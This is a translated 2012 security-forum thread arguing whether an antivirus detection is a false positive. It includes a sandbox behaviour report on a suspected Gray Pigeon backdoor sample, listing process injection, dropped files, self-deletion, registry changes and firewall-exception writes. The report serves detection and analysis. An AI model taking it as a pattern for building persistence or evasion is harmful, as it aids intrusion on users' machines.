Thread starter: 家渝

[False-positive file] 金山卫士 false positive?

cfans
Posted on 2012-6-20 13:16:55
/tiao眼镜鱼 posted on 2012-6-20 13:10
Kingsoft staff say it's malicious

It is malicious in the first place; I've already uploaded it to 火眼.
cfans
Posted on 2012-6-20 13:18:58
maomao110 posted on 2012-6-20 11:59
You can tell from the name alone that it's a false positive

You can't say that.

Normal software doesn't have a realaudo directory, and if you analyse the file you'll see it's a virus.
cfans
Posted on 2012-6-20 13:20:35
wuyongliang posted on 2012-6-20 10:54
This is a false positive on a driver

Please look at the file before you speak; don't jump to conclusions.
cfans
Posted on 2012-6-20 13:31:53
This virus is suspected to be a 灰鸽子 (Gray Pigeon) program.

See the 金山火眼 analysis for details:
https://fireeye.ijinshan.com/ana ... a88e1e7ce2e3e865e58
/tiao眼镜鱼
Posted on 2012-6-20 13:45:27
cfans posted on 2012-6-20 13:31
This virus is suspected to be a 灰鸽子 (Gray Pigeon) program.

See the 金山火眼 analysis for details

You have a 火眼 invitation code?? How did you get it???
jayavira
Posted on 2012-6-20 13:52:15
=====Sample Summary=====
File name: sample.exe
MD5: F1101D3B53A0BA88E1E7CE2E3E865E58
SHA1: 9BCB0D03AC8EBAD2412829765A4532AAAF6E35D1
SHA256: E46B3C01A1BF1F27324FD73D7C2F4E7E8CA815D55113ACFAE588E4A84312F324

=====Major Threats=====

=====Behavior Details=====

Create process:
sample.exe --> C:\Program Files\RealAudo\Ac97\GooglePinying.exe
sample.exe --> C:\WINDOWS\system32\cmd.exe
GooglePinying.e --> C:\WINDOWS\system32\ipconfig.exe
GooglePinying.e --> C:\WINDOWS\system32\netsh.exe
GooglePinying.e --> C:\WINDOWS\system32\net.exe
net.exe --> C:\WINDOWS\system32\net1.exe
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp\xhuupc.tmp
xhuupc.tmp --> C:\WINDOWS\system32\svchost.exe
svchost.exe --> C:\WINDOWS\system32\wbem\wmiprvse.exe

Create remote thread:
sample.exe --> GooglePinying.e
sample.exe --> cmd.exe
GooglePinying.e --> ipconfig.exe
GooglePinying.e --> netsh.exe
GooglePinying.e --> net.exe
net.exe --> net1.exe
GooglePinying.e --> xqcqpj.tmp
xqcqpj.tmp --> xhuupc.tmp
xhuupc.tmp --> svchost.exe
svchost.exe --> wmiprvse.exe

Create file:
sample.exe --> C:\Program Files\RealAudo
sample.exe --> C:\Program Files\RealAudo\Ac97
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau21.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau22.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau23.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau24.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau25.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau26.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau27.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau28.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau29.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxau30.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\RtlCPAPI.dll
sample.exe --> C:\Program Files\RealAudo\Ac97\ALSndMgr.cpl
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxwdm1.cat
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcxwdm0.cat
sample.exe --> C:\Program Files\RealAudo\Ac97\Alcwdm6.inf
sample.exe --> C:\Program Files\RealAudo\Ac97\GooglePinying.exe
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp\_RND_3.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp\_RND_3.tmp\vsionet.exe
wmiprvse.exe --> C:\WINDOWS\TEMP\Perflib_Perfdata_2bc.dat

Delete file:
cmd.exe --> C:\WINDOWS\system32\vddwewe12dasdw.ded
cmd.exe --> C:\sample.exe
cmd.exe --> C:\WINDOWS\system32\dewdcedfasdfd.bat
svchost.exe --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vfr493~tmp\_RND_3.tmp\vsionet.exe
cmd.exe --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\vddwewe12dasdw.ded
cmd.exe --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\dewdcedfasdfd.bat

Create key:
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install\Recent File List
sample.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install\Settings
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio Compression Manager
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
ipconfig.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install\Recent File List
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install\Settings
GooglePinying.e --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig\Enroll
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig\Enroll\HcsGroups
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\Shas
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\Qecs
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\napagent\LocalConfig\UI
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\MediaProperties
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\MediaProperties\PrivateProperties
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\MediaProperties\PrivateProperties\Joystick
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio Compression Manager
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
wmiprvse.exe --> \REGISTRY\USER\S-1-5-20\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch

Delete key:
GooglePinying.e --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Local AppWizard-Generated Applications\install\Recent File List
GooglePinying.e --> \REGISTRY\USER\.DEFAULT\Software\Local AppWizard-Generated Applications\install\Recent File List

Set value key:
sample.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C8 B7 B1 5B 9C B9 0C B3 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [B9 31 47 40 B2 0B D3 B0 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [01 BB 67 BF 3D 76 F8 59 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\LogSessionName ["stdout"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\Active [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\ControlFlags [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier\Guid ["5f31090b-d990-4e91-b16d-46121d0255aa"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier\BitNames [" Error Unusual Info Debug"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\LogSessionName ["stdout"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\Active [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\ControlFlags [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier\Guid ["5f31090b-d990-4e91-b16d-46121d0255aa"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier\BitNames [" Error Unusual Info Debug"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\LogSessionName ["stdout"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\Active [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\ControlFlags [0x1]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier\Guid ["8aefce96-4618-42ff-a057-3536aa78233e"]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier\BitNames [" Error Unusual Info Debug"]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile ["C:\WINDOWS\system32\ESENT.dll"]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile ["C:\WINDOWS\system32\ESENT.dll"]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryCount [0x10]
ipconfig.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\TypesSupported [0x7]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2C B2 54 F7 24 42 C0 C4 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [66 91 B7 03 27 70 A9 14 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [9E 7B 1B DE 67 A7 57 5C ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [60 6A F4 01 A1 E8 79 CA ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6A 6D 4B 7F 18 10 44 67 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [99 F4 F2 06 A1 77 FD 97 ...]
ipconfig.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2C D2 D7 63 73 77 81 10 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\DIUG ["hfzOToTQZMd3duug/vlYVwoLXJ9XolCCoyBUVwhAJ1Q="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\CAM ["hfzOToTQZMd3duug/vlYVwoLXJ9XolCCoyBUVwhAJ1Q="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\P1 ["1PmIF9aE"]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\P2
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\P3
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\CTC ["gA=="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\ISO ["gA=="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\StacSV\VSO ["gA=="]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [5D B3 9F 3C F1 8D 26 E4 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2E 5D AC C5 8E 80 43 E0 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C6 AC BA 8D 30 41 D8 BD ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [15 C1 D2 04 70 73 F9 98 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [B5 7D B0 7D 56 DD D1 DB ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [30 0C 60 FE 98 19 62 93 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [2B 80 01 A8 3F AE DF 19 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C2 86 A0 43 26 8C BE 76 ...]
net.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6B 4C 68 08 E8 42 6E 49 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [DA A8 FF E7 47 5C FA E7 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [88 E8 88 47 F4 9F 0B EE ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [1A 59 B9 B3 3B 16 CF 3E ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [85 06 94 B9 CE 16 BD D7 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [AA 07 1C 15 AE 66 82 37 ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F6 D1 47 DD AC 0E F8 7E ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [8E DE 86 65 EA AC EE FE ...]
net1.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [0B 1C BD 14 C7 26 A4 26 ...]
GooglePinying.e --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F7 6B 61 74 16 38 E6 8A ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [C5 2F 48 2D 71 6D 61 93 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [1F CE FF B8 1E FB F2 B3 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [5F E9 D9 2C E0 39 85 47 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6C B0 52 74 8B 2C 6C F6 ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F3 4A B3 F0 FB 65 40 6B ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [5F 18 FD A2 B1 0A 19 8C ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [02 63 2F EB 85 52 08 0B ...]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing [0x0]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing [0x0]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask [0xFFFF0000]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\ConsoleTracingMask [0xFFFF0000]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\MaxFileSize [0x100000]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG\FileDirectory ["%windir%\tracing"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [37 50 55 39 DF 0F 31 3A ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\StacSV\CTC ["hqg="]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths [0x4]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache1"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache2"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache3"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath ["C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Cache4"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CacheLimit [0xC02E]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies ["C:\Documents and Settings\Administrator\Cookies"]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\History ["C:\Documents and Settings\Administrator\Local Settings\History"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\LogSessionName ["stdout"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Active [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\ControlFlags [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr\Guid ["710adbf0-ce88-40b4-a50d-231ada6593f0"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr\BitNames [" NAP_TRACE_BASE NAP_TRACE_NETSH"]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [FD B0 EA 83 82 2A DD CC ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [4B 63 CE FE 23 CD DA AA ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [11 6E 67 EC 51 EE 77 7B ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [9A B7 C9 18 EF 5F 1C 21 ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [58 2E DA A7 0D 09 AE B0 ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [F8 33 84 44 B3 50 A4 DD ...]
svchost.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [09 3B 27 67 68 64 F5 58 ...]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable [0x0]
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable [0x0]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings [3C 00 00 00 1D 00 00 00 ...]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass [0x1]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName [0x1]
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\LogSessionName ["stdout"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\Active [0x1]
